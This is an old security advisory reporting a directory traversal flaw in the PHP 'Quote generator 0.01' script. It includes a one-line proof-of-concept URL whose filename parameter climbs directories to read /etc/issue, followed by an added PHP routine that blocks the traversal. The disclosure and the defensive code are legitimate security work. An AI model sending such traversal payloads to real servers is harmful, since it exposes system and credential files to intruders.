Quote generator 0.01 by Eric Persson

2001-04-27T00:00:00
ID SECURITYVULNS:DOC:1562
Type securityvulns
Reporter Securityvulns
Modified 2001-04-27T00:00:00

Description

Hi all,

Quote generator 0.01 (PHP script) by Eric Persson is vulnerable to the ../.. bug. Try this:

www.yourhost.com/quote.html?filename=../../../../../../../../../../../../../../../../etc/issue&path_to_font_file=ariali.ttf

It gives you the content of the /etc/issue file.

regards,


Cabezon Aurélien
iSecureLabs team
http://www.iSecureLabs.com
French Staff
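
The check that closes this class of bug, as an added example (not part of the original post and not Quote generator's own code): the user-supplied name is canonicalised and served only if it still lies inside the intended directory. The helper name `resolve_inside` and the demo directory are hypothetical; only the `filename` parameter and the traversal string come from the report, and the same check would apply to `path_to_font_file`.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a user-supplied name to a regular file inside $baseDir.
 * Returns the canonical path, or null when the request must be refused.
 * (Hypothetical helper for illustration.)
 */
function resolve_inside(string $baseDir, string $userName): ?string
{
    // Empty names and NUL bytes are never valid file names.
    if ($userName === '' || strpos($userName, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" sequences and follows symlinks;
    // it returns false when the target does not exist.
    $real = realpath($base . DIRECTORY_SEPARATOR . $userName);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare against the base WITH a trailing separator, so a sibling
    // such as "/srv/quotes-old" does not pass as "/srv/quotes".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Constructed demo data: a temporary quote directory with one file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'quotes_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'quotes.txt', "constructed sample quote\n");

// One legitimate name, the traversal form from the report, an absolute path.
foreach (['quotes.txt', '../../../../etc/issue', '/etc/issue'] as $name) {
    $path = resolve_inside($dir, $name);
    printf("%-24s => %s\n", $name, $path === null ? 'rejected' : 'served');
}

unlink($dir . DIRECTORY_SEPARATOR . 'quotes.txt');
rmdir($dir);
```

In a request handler, the value of `$_GET['filename']` would be passed through the same function and the request refused when it returns null.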